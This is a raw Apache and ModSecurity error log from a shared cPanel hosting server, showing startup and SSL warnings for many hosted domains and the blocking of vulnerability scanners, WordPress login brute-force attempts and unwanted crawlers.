[Tue May 26 12:43:40.888935 2026] [lsapi:notice] [pid 333123:tid 333123] mod_lsapi: version 1.1-92
[Tue May 26 12:43:40.891583 2026] [:notice] [pid 448910:tid 448910] [host root@md-74.webhostbox.net] mod_lsapi: Selfstarter 448910 started
[Tue May 26 12:43:40.909314 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: earthone.me.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.921299 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: arborvitae.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.921903 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: cargo-pulse.info.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.929872 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: vobre.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.941994 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dezkapro.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.942300 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: bld4u.mx.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.942643 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: eco-green.com.mx.grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.945808 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ntgpnk.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.946148 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: 1earth.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.946744 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: wildcatc.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.947013 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ntgpnk.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.947554 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: parjanya.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.947867 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: canopykaapi.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.948163 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: canopycoffee.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.948427 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: aarinienergy.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.948994 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: hassantourism.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.949264 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: rohiniventures.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.949705 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: adishankara.in.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.950291 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: actindiamovement.aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.952444 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: grupo2g.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.952790 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: directi.con:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.953056 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: carpetlive.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.954021 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: aarini.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.973636 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: kingsclubbanquet.com.kingsclub.in:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.973955 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: kingsclubmembership.com.kingsclub.in:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.978478 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: rbi-cin.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.979361 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: jbrainit.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.979693 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: phpridles.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.980540 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: updates9ja.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.980902 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: lookqueenny.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.981219 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: 9jareporter.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.981484 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: joshchibuzor.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.982153 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: chyamsempire.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.982484 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: builderscorner.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.982899 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: industrialvacumunit.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.983198 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: chukwuebukafreestyle.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.983558 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: ecolinksglobalexpressdelivery.evitafrica.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.984454 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: cwh.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.984823 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: senoro.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.985141 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: crystalclear.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.985459 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: theorestaurante.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.985762 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: garciagutierrez.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.986064 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: theorestaurantecom.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.986334 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: autopartesenguadalajara.e3publicidad.mx:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.987215 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dprassurance.lk.dpr.lk:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.989231 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: thriveswift.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.989520 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: gauravchhabradigital.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.991321 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: garciaitconsultores.com.bandita-data.net:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.995854 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: mtm117.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.996143 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: makwasi.com.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.996402 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: baka-bau.com.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.996680 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: alpha-bau.net.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.996945 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: t9-security.eu.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:40.997196 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: north-connect.de.axum-vermogen.eu:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.002993 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: pdrwebsolutions.cloud:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.009800 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: dpr.lk:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.014054 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: myigfollowers.digitalgerminate.com:443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.024673 2026] [ssl:warn] [pid 333123:tid 333123] AH01909: localhost:8443:0 server certificate does NOT include an ID which matches the server name
[Tue May 26 12:43:41.029956 2026] [qos:notice] [pid 333123:tid 333123] mod_qos(007): calculated MaxClients/MaxRequestWorkers (max connections): 6144, applied limit: 2048 (QS_MaxClients)
[Tue May 26 12:43:41.098655 2026] [http2:info] [pid 333123:tid 333123] AH03090: mod_http2 (v2.0.39, feats=CHPRIO+SHA256+INVHD+DWINS, nghttp2 1.69.0), initializing...
[ N 2026-05-26 12:43:41.1201 448915/T1 age/Wat/WatchdogMain.cpp:1377 ]: Starting Passenger watchdog...
[ N 2026-05-26 12:43:41.1322 448918/T1 age/Cor/CoreMain.cpp:1340 ]: Starting Passenger core...
[ N 2026-05-26 12:43:41.1324 448918/T1 age/Cor/CoreMain.cpp:256 ]: Passenger core running in multi-application mode.
[ N 2026-05-26 12:43:41.1515 448918/T1 age/Cor/CoreMain.cpp:1015 ]: Passenger core online, PID 448918
[Tue May 26 12:43:41.154095 2026] [mpm_event:notice] [pid 333123:tid 333123] AH00489: Apache/2.4.67 (cPanel) OpenSSL/1.1.1w Apache mod_qos/11.76 mod_bwlimited/1.4 mod_fcgid/2.3.9 Phusion_Passenger/6.0.20 mod_rbld2.0 configured -- resuming normal operations
[Tue May 26 12:43:41.154118 2026] [core:notice] [pid 333123:tid 333123] AH00094: Command line: '/usr/sbin/httpd'
[Tue May 26 12:43:42.173786 2026] [http2:info] [pid 448967:tid 448967] h2_workers: created with min=128 max=192 idle_ms=600000
[Tue May 26 12:43:42.426990 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5204] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/index/function.php"] [unique_id "ahVIJuXLPuWQsfM-UVSQLQAAAA0"]
[Tue May 26 12:43:43.778824 2026] [security2:error] [pid 448967:tid 449214] [client 85.208.96.200:59498] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVIJ-XLPuWQsfM-UVSQRgAAAHU"]
[Tue May 26 12:43:43.778958 2026] [security2:error] [pid 448967:tid 449214] [client 85.208.96.200:59498] ModSecurity: Warning. Matched phrase "Semrush" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "406"] [hostname "theafterglow-centre.com"] [uri "/events/list/page/4/"] [unique_id "ahVIJ-XLPuWQsfM-UVSQRgAAAHU"]
[Tue May 26 12:43:44.746592 2026] [security2:error] [pid 448967:tid 449128] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIJuXLPuWQsfM-UVSQJQAAAB8"]
[Tue May 26 12:43:44.752546 2026] [security2:error] [pid 448967:tid 449206] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIJ-XLPuWQsfM-UVSQTAAAAG0"]
[Tue May 26 12:43:44.752938 2026] [security2:error] [pid 448967:tid 449126] [client 57.141.2.25:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIJuXLPuWQsfM-UVSQIwAAAB0"]
[Tue May 26 12:43:44.758280 2026] [security2:error] [pid 448967:tid 449138] [client 57.141.2.30:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIJuXLPuWQsfM-UVSQLAAAACk"]
[Tue May 26 12:43:44.874831 2026] [security2:error] [pid 448967:tid 449134] [client 157.20.138.61:54725] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIKOXLPuWQsfM-UVSQYAAAACU"]
[Tue May 26 12:43:44.874970 2026] [security2:error] [pid 448967:tid 449134] [client 157.20.138.61:54725] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIKOXLPuWQsfM-UVSQYAAAACU"]
[Tue May 26 12:43:45.627345 2026] [security2:error] [pid 448967:tid 449115] [client 4.201.75.230:5896] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/ws.php"] [unique_id "ahVIKeXLPuWQsfM-UVSQfAAAABI"]
[Tue May 26 12:43:47.466795 2026] [security2:error] [pid 448967:tid 449224] [client 57.141.2.4:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIK-XLPuWQsfM-UVSQrgAAAH8"]
[Tue May 26 12:43:49.627937 2026] [autoindex:error] [pid 448967:tid 449097] [client 43.157.149.188:56282] AH01276: Cannot serve directory /home2/besglde8/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 12:43:50.494646 2026] [security2:error] [pid 448967:tid 449129] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVILuXLPuWQsfM-UVSRCAAAACA"]
[Tue May 26 12:43:52.717532 2026] [security2:error] [pid 448967:tid 449190] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIMOXLPuWQsfM-UVSRNgAAAF0"]
[Tue May 26 12:43:53.327859 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5913] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/404.php"] [unique_id "ahVIMeXLPuWQsfM-UVSRSwAAAA0"]
[Tue May 26 12:43:55.587248 2026] [security2:error] [pid 448967:tid 449152] [client 157.20.138.61:55073] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIM-XLPuWQsfM-UVSRbAAAADc"]
[Tue May 26 12:43:55.587489 2026] [security2:error] [pid 448967:tid 449152] [client 157.20.138.61:55073] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIM-XLPuWQsfM-UVSRbAAAADc"]
[Tue May 26 12:43:56.157038 2026] [security2:error] [pid 448967:tid 449140] [client 57.141.2.58:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIM-XLPuWQsfM-UVSRcgAAACs"]
[Tue May 26 12:43:58.563599 2026] [security2:error] [pid 448967:tid 449186] [client 113.164.207.65:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVINuXLPuWQsfM-UVSRmAAAAFk"]
[Tue May 26 12:43:58.935709 2026] [security2:error] [pid 448967:tid 449111] [client 4.201.75.230:5636] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-admin/user/index.php"] [unique_id "ahVINuXLPuWQsfM-UVSRpwAAAA4"]
[Tue May 26 12:43:59.245046 2026] [security2:error] [pid 448967:tid 449224] [client 57.141.2.67:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVINuXLPuWQsfM-UVSRoQAAAH8"]
[Tue May 26 12:43:59.686842 2026] [security2:error] [pid 448967:tid 449020] [remote 103.145.62.145:41175] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 145.62.145.103.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "dimensioncorporativa.com.co"] [uri "/wp-login.php"] [unique_id "ahVIN-XLPuWQsfM-UVSRsAAACjQ"]
[Tue May 26 12:44:00.370423 2026] [security2:error] [pid 448967:tid 449187] [client 4.201.75.230:5638] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-conf.php"] [unique_id "ahVIOOXLPuWQsfM-UVSRtwAAAFo"]
[Tue May 26 12:44:01.936411 2026] [security2:error] [pid 448967:tid 449223] [client 57.141.2.46:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIOeXLPuWQsfM-UVSRzAAAAH4"]
[Tue May 26 12:44:02.263817 2026] [security2:error] [pid 448967:tid 449031] [remote 211.23.68.235:28758] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "atreegroup.com"] [uri "/wp-login.php"] [unique_id "ahVIOuXLPuWQsfM-UVSR1AAAbj8"]
[Tue May 26 12:44:04.922837 2026] [security2:error] [pid 448967:tid 449180] [client 57.141.2.1:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIPOXLPuWQsfM-UVSR9QAAAFM"]
[Tue May 26 12:44:05.615205 2026] [security2:error] [pid 448967:tid 449131] [client 4.201.75.230:5670] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/wp-login.php"] [unique_id "ahVIPeXLPuWQsfM-UVSSBwAAACI"]
[Tue May 26 12:44:06.010058 2026] [security2:error] [pid 448967:tid 449156] [client 157.20.138.61:55422] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIPuXLPuWQsfM-UVSSDwAAADs"]
[Tue May 26 12:44:06.010189 2026] [security2:error] [pid 448967:tid 449156] [client 157.20.138.61:55422] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVIPuXLPuWQsfM-UVSSDwAAADs"]
[Tue May 26 12:44:07.237406 2026] [security2:error] [pid 448967:tid 449219] [client 57.141.2.5:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIPuXLPuWQsfM-UVSSHQAAAHo"]
[Tue May 26 12:44:07.529597 2026] [security2:error] [pid 448967:tid 449110] [client 4.201.75.230:5672] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/abc.php"] [unique_id "ahVIP-XLPuWQsfM-UVSSJQAAAA0"]
[Tue May 26 12:44:10.600674 2026] [security2:error] [pid 448967:tid 449203] [client 57.141.2.18:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIQuXLPuWQsfM-UVSSUgAAAGo"]
[Tue May 26 12:44:12.921282 2026] [security2:error] [pid 448967:tid 449106] [client 4.201.75.230:5632] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 230.75.201.4.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "_dc-mx.71c7ba1f5f35.stockmarketanalysis.in"] [uri "/abcd.php"] [unique_id "ahVIROXLPuWQsfM-UVSSgwAAAAk"]
[Tue May 26 12:44:13.515639 2026] [security2:error] [pid 448967:tid 449196] [client 57.141.2.26:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVIReXLPuWQsfM-UVSSjAAAAGM"]
[Tue May 26 12:44:14.562644 2026] [security2:error] [pid 448967:tid 449193] [client 178.20.44.140:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahVIRuXLPuWQsfM-UVSSrgAAAGA"], referer: http://anujtradingco.com/top-deejay-headphones/?unapproved=1203509&moderation-hash=30ff998383af377c781773c90331cda3
[Tue May 26 12:44:16.485676 2026] [security2:error] [pid 448967:tid 449105] [client 57.141.2.23:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVISOXLPuWQsfM-UVSSwwAAAAg"]
[Tue May 26 12:44:16.641538 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:55774] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 61.138.20.157.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVISOXLPuWQsfM-UVSS1AAAAEY"]
[Tue May 26 12:44:16.641655 2026] [security2:error] [pid 448967:tid 449167] [client 157.20.138.61:55774] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "151"] [id "900405"] [msg "xmlrpc POST logging"] [data "409"] [hostname "preetishah.com"] [uri "/xmlrpc.php"] [unique_id "ahVISOXLPuWQsfM-UVSS1AAAAEY"]
[Tue May 26 12:44:17.373214 2026] [security2:error] [pid 448967:tid 449214] [client 74.7.175.179:0] ModSecurity: Warning. Matched phrase "oBot" at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "168"] [id "350001"] [msg "BAD BOT - Detected LOGGING"] [data "200"] [hostname "nicmaperu.com"] [uri "/index.php"] [unique_id "ahVIRuXLPuWQsfM-UVSSowAAAHU"]
